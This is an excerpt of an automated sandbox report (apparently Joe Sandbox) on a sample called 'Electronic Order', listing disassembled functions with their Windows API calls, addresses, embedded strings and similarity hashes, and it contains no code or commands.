                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: 58951b7e044831b79b90d5b7fcc3ec3ea288fc9032c76d12a216be01556145ca
                                      • Instruction ID: 05796e8c1d397c144bde1dee415995eea8c7739f8b30f0e9dcc87548e4f5e411
                                      • Opcode Fuzzy Hash: 58951b7e044831b79b90d5b7fcc3ec3ea288fc9032c76d12a216be01556145ca
                                      • Instruction Fuzzy Hash: 63512C30A047A819FB35EBB0A4547EABFF49F11384F08559AC5C2765C3DA649B8CCF61
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 00E1C746
                                      • GetWindowRect.USER32(00000000,?), ref: 00E1C758
                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00E1C7B6
                                      • GetDlgItem.USER32(?,00000002), ref: 00E1C7C1
                                      • GetWindowRect.USER32(00000000,?), ref: 00E1C7D3
                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00E1C827
                                      • GetDlgItem.USER32(?,000003E9), ref: 00E1C835
                                      • GetWindowRect.USER32(00000000,?), ref: 00E1C846
                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00E1C889
                                      • GetDlgItem.USER32(?,000003EA), ref: 00E1C897
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00E1C8B4
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00E1C8C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 1ced92245293d37b24b994100113b1e574ec90df011eb57d351b7cb57027edb4
                                      • Instruction ID: 5db6ad371d7c4db9145aa00cc00534d370a57742dc26f32aeac4973ac83d8371
                                      • Opcode Fuzzy Hash: 1ced92245293d37b24b994100113b1e574ec90df011eb57d351b7cb57027edb4
                                      • Instruction Fuzzy Hash: BD517075B00205AFDB08CF69DD89AAEBBB6EB89710F14812DF515E7290D770AD44CB50
                                      APIs
                                        • Part of subcall function 00DC1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00DC2036,?,00000000,?,?,?,?,00DC16CB,00000000,?), ref: 00DC1B9A
                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00DC20D3
                                      • KillTimer.USER32(-00000001,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DC216E
                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00DFBEF6
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DFBF27
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DFBF3E
                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00DC16CB,00000000,?,?,00DC1AE2,?,?), ref: 00DFBF5A
                                      • DeleteObject.GDI32(00000000), ref: 00DFBF6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 641708696-0
                                      • Opcode ID: 7443283d7baff8e59435e2e0d081be9b2eeba874b98264155e855dc067811dab
                                      • Instruction ID: 32f13e3657276a15b3eed0d03a35b3e4b1d71127d3506db639148c96803fafca
                                      • Opcode Fuzzy Hash: 7443283d7baff8e59435e2e0d081be9b2eeba874b98264155e855dc067811dab
                                      • Instruction Fuzzy Hash: 25617A34500616DFCB299F15DD48B39B7F1FF41322F18842EE18A67960C776A895EFA0
                                      APIs
                                        • Part of subcall function 00DC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00DC25EC
                                      • GetSysColor.USER32(0000000F), ref: 00DC21D3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ColorLongWindow
                                      • String ID:
                                      • API String ID: 259745315-0
                                      • Opcode ID: eeb37af4496280b30a200e323727cd32a85ebc64fd02b611135fa64d04ea7fd3
                                      • Instruction ID: 030931566f228210f7552dd32e28147900f92ab031fcd388af769745d14f3916
                                      • Opcode Fuzzy Hash: eeb37af4496280b30a200e323727cd32a85ebc64fd02b611135fa64d04ea7fd3
                                      • Instruction Fuzzy Hash: 2541CF35000245AFDB219F28DC88FB97B65EB06731F184269FE659B2E2C7318C42DB35
                                      APIs
                                      • CharLowerBuffW.USER32(?,?,00E4F910), ref: 00E2AB76
                                      • GetDriveTypeW.KERNEL32(00000061,00E7A620,00000061), ref: 00E2AC40
                                      • _wcscpy.LIBCMT ref: 00E2AC6A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
• Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: BuffCharDriveLowerType_wcscpy
                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                      • API String ID: 2820617543-1000479233
                                      • Opcode ID: 0adc7d2617591614594c67fbcb29373e125754594faad2128bcb4900b096fd10
                                      • Instruction ID: b2c34860f882af3d30e3ae3b2041c59b3efc46013b4392fc0852f5ed749f70d9
                                      • Instruction Fuzzy Hash: C851A0301083529FC714EF14D892EAEB7A5EF80714F18582DF496A72A2DB71DD49CB63
                                      APIs
                                        • Part of subcall function 00DC2612: GetWindowLongW.USER32(?,000000EB), ref: 00DC2623
                                        • Part of subcall function 00DC2344: GetCursorPos.USER32(?), ref: 00DC2357
                                        • Part of subcall function 00DC2344: ScreenToClient.USER32(00E867B0,?), ref: 00DC2374
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000001), ref: 00DC2399
                                        • Part of subcall function 00DC2344: GetAsyncKeyState.USER32(00000002), ref: 00DC23A7
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 00E4C2E4
                                      • ImageList_EndDrag.COMCTL32 ref: 00E4C2EA
                                      • ReleaseCapture.USER32 ref: 00E4C2F0
                                      • SetWindowTextW.USER32(?,00000000), ref: 00E4C39A
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E4C3AD
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 00E4C48F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID$pr$pr
                                      • API String ID: 1924731296-488423084
                                      • Opcode ID: 0cffd1665fc2c9991048e4c47c25c5e421f3b6dcbe266df6ec8cfb16a0b538b4
                                      • Instruction ID: 0f62c5d8dbde1b073f83e3205227c1aa742b07fae4d32fe6cb0abde9c89657b7
                                      • Instruction Fuzzy Hash: B851BB74204301AFD704EF21D896F6A7BE1EF88714F10852DF599AB2E1CB70A948CB62
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: __i64tow__itow__swprintf
                                      • String ID: %.15g$0x%p$False$True
                                      • API String ID: 421087845-2263619337
                                      • Opcode ID: 4b6c95ffbb6c0645278e9ff3d107b3a330972993af7b7aa5973821e89114d1d8
                                      • Instruction ID: 28df43ea7b0e3cad2cedf010ef6c792094d633988dd61ed51c515f63663f0c9f
                                      • Instruction Fuzzy Hash: AF41B57160420AAADB24AB35D846F7AB7E8EF45300F24846EE689D7291EE71D941CF31
                                      APIs
                                      • _memset.LIBCMT ref: 00E473D9
                                      • CreateMenu.USER32 ref: 00E473F4
                                      • SetMenu.USER32(?,00000000), ref: 00E47403
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E47490
                                      • IsMenu.USER32(?), ref: 00E474A6
                                      • CreatePopupMenu.USER32 ref: 00E474B0
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E474DD
                                      • DrawMenuBar.USER32 ref: 00E474E5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                      • String ID: 0$F
                                      • API String ID: 176399719-3044882817
                                      • Opcode ID: 5f54432dad1394430be08bb98fd45421b1d8d232f6824b57aeda194b54124316
                                      • Instruction ID: 93a53197d91210b2f3b47ad9480d8008f21f40dfdb12c7d33881a19e50e5a9e3
                                      • Instruction Fuzzy Hash: 4B415A78A00205EFDB10DF65E844EAABBF5FF49305F144029E959B7350D735AD14CBA0
                                      APIs
                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00E477CD
                                      • CreateCompatibleDC.GDI32(00000000), ref: 00E477D4
                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00E477E7
                                      • SelectObject.GDI32(00000000,00000000), ref: 00E477EF
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E477FA
                                      • DeleteDC.GDI32(00000000), ref: 00E47803
                                      • GetWindowLongW.USER32(?,000000EC), ref: 00E4780D
                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00E47821
                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00E4782D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                      • String ID: static
                                      • API String ID: 2559357485-2160076837
                                      • Opcode ID: 7de898756c30d695dc626237ac9c3b8ae7a38b455c2fa5c37e38db4020cad467
                                      • Instruction ID: cf1af90808e945b8ab6b1f845cb6d3c0277657d9129f8c972eb79d984e5cafa6
                                      • Instruction Fuzzy Hash: 6A31AA36101215AFDF119FA5EC08FDA3B69EF0E725F110225FA55B60A0C731D826DBA0
                                      APIs
                                      • _memset.LIBCMT ref: 00DE707B
                                        • Part of subcall function 00DE8D68: __getptd_noexit.LIBCMT ref: 00DE8D68
                                      • __gmtime64_s.LIBCMT ref: 00DE7114
                                      • __gmtime64_s.LIBCMT ref: 00DE714A
                                      • __gmtime64_s.LIBCMT ref: 00DE7167
                                      • __allrem.LIBCMT ref: 00DE71BD
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE71D9
                                      • __allrem.LIBCMT ref: 00DE71F0
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE720E
                                      • __allrem.LIBCMT ref: 00DE7225
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DE7243
                                      • __invoke_watson.LIBCMT ref: 00DE72B4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                      • String ID:
                                      • API String ID: 384356119-0
                                      • Opcode ID: 85949ae18b549cd2d12431497598bef6b028e5a4746e3945652a320069ef6a5a
                                      • Instruction ID: dd04f5fc0f126df7dca2295590aa031b35da4e929d4369efd1ca897a67aa3cb5
                                      • Instruction Fuzzy Hash: FA71F871A04757ABD754BE7ACC42B6AB3B8FF10320F15822AF614E7681E770E94087B4
                                      APIs
                                      • _memset.LIBCMT ref: 00E22A31
                                      • GetMenuItemInfoW.USER32(00E86890,000000FF,00000000,00000030), ref: 00E22A92
                                      • SetMenuItemInfoW.USER32(00E86890,00000004,00000000,00000030), ref: 00E22AC8
                                      • Sleep.KERNEL32(000001F4), ref: 00E22ADA
                                      • GetMenuItemCount.USER32(?), ref: 00E22B1E
                                      • GetMenuItemID.USER32(?,00000000), ref: 00E22B3A
                                      • GetMenuItemID.USER32(?,-00000001), ref: 00E22B64
                                      • GetMenuItemID.USER32(?,?), ref: 00E22BA9
                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E22BEF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E22C03
                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E22C24
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                      • String ID:
                                      • API String ID: 4176008265-0
                                      • Opcode ID: 477be848895ea2cb25704c7ba6041a421a78c2393c3930b16715821cce0e0ad7
                                      • Instruction ID: 011d5f3bc2a42354e74ebac56de31034ca235a235c5eea8aa6449e05ee9b910f
                                      • Instruction Fuzzy Hash: 5061BFB0900259BFDB21CF64EC88EEEBBB8EB41308F14556DEA41B7251D731AD06DB20
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E47214
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E47217
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E4723B
                                      • _memset.LIBCMT ref: 00E4724C
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E4725E
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E472D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow_memset
                                      • String ID:
                                      • API String ID: 830647256-0
                                      • Opcode ID: 2e1e44449717b312f46c6c63f2d75a860580d75e71490c1c136695e48f6f7c05
                                      • Instruction ID: 2e24f9e8118ae7d45446c173c99159ecfb64bd25f5a11fd2419d958e3a826cd6
                                      • Instruction Fuzzy Hash: 37616875A00208AFDB10DFA4DC81EEE77F8EB09714F144199FA58B72A1C771AA45DBA0
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00E17135
                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00E1718E
                                      • VariantInit.OLEAUT32(?), ref: 00E171A0
                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00E171C0
                                      • VariantCopy.OLEAUT32(?,?), ref: 00E17213
                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00E17227
                                      • VariantClear.OLEAUT32(?), ref: 00E1723C
                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00E17249
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E17252
                                      • VariantClear.OLEAUT32(?), ref: 00E17264
                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00E1726F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                      • String ID:
                                      • API String ID: 2706829360-0
                                      • Opcode ID: a9748bb90c40b051ee89351efb7b97a36a03de043cf4fcd3afbf49c5f412b224
                                      • Instruction ID: e7fe2bd7eba04471011f8cf6130439e000f1c80a8385b15cd5816fa68610eda8
                                      • Instruction Fuzzy Hash: F6414075A04219AFCB04DF65D848DEEBBB8FF48754F008069F955B7261CB30A986CBA0
                                      APIs
                                      • WSAStartup.WSOCK32(00000101,?), ref: 00E35AA6
                                      • inet_addr.WSOCK32(?,?,?), ref: 00E35AEB
                                      • gethostbyname.WSOCK32(?), ref: 00E35AF7
                                      • IcmpCreateFile.IPHLPAPI ref: 00E35B05
                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00E35B75
                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00E35B8B
                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00E35C00
                                      • WSACleanup.WSOCK32 ref: 00E35C06
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                      • String ID: Ping
                                      • API String ID: 1028309954-2246546115
                                      • Opcode ID: 29913dd624dd68fc3515d514d364ce99b9e2a5b898b2938e703cf3e522c707dd
                                      • Instruction ID: 17f8ed18fe7c43c42d9ed49368d6e6e702b76ebb36cb969ab9dd5db4f15cb753
                                      • Instruction Fuzzy Hash: 6951BE322047019FD710EF25DC49B6ABBE4EF48714F04992AF95AEB3A1DB70E844CB21
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 00E2B73B
                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00E2B7B1
                                      • GetLastError.KERNEL32 ref: 00E2B7BB
                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 00E2B828
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: Error$Mode$DiskFreeLastSpace
                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                      • API String ID: 4194297153-14809454
                                      • Opcode ID: 6957f81aee824f54f89e72d6f715b602217310c28b050da0b08380a38a359739
                                      • Instruction ID: ad68ff98bafcc7609803cf0bb2e93b9c1f9bf6d80a02efe57b37e637a687d862
                                      • Instruction Fuzzy Hash: 9C31A135A002159FDB04EF64E889EAEB7B4EF84704F14912AF405F7292DB719942CB61
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00E194F6
                                      • GetDlgCtrlID.USER32 ref: 00E19501
                                      • GetParent.USER32 ref: 00E1951D
                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00E19520
                                      • GetDlgCtrlID.USER32(?), ref: 00E19529
                                      • GetParent.USER32(?), ref: 00E19545
                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00E19548
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2125260177.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true
                                      • Associated: 00000000.00000002.2125203974.0000000000DC0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E4F000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125341452.0000000000E75000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125470790.0000000000E7F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2125528104.0000000000E88000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_dc0000_Electronic Order.jbxd
                                      Similarity
                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 1536045017-1403004172
                                      • Opcode ID: cb1dc12f4be5760c5e5b9a684e8f6abcbf65e2e646471b41d895cf82bf480712
                                      • Instruction ID: 14d672b526d08734a2fdfab2b3cf9ae3b98e0f29d8dd5b1f969b1a15eb8ca266
                                      • Instruction Fuzzy Hash: 0421E074E00204AFDF00ABA1CCD5EFEBBA5EF49300F104169F922A72A2DB7559599B70
                                      APIs
                                        • Part of subcall function 00DC7F41: _memmove.LIBCMT ref: 00DC7F82
                                        • Part of subcall function 00E1B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E1B0E7
                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00E195DF
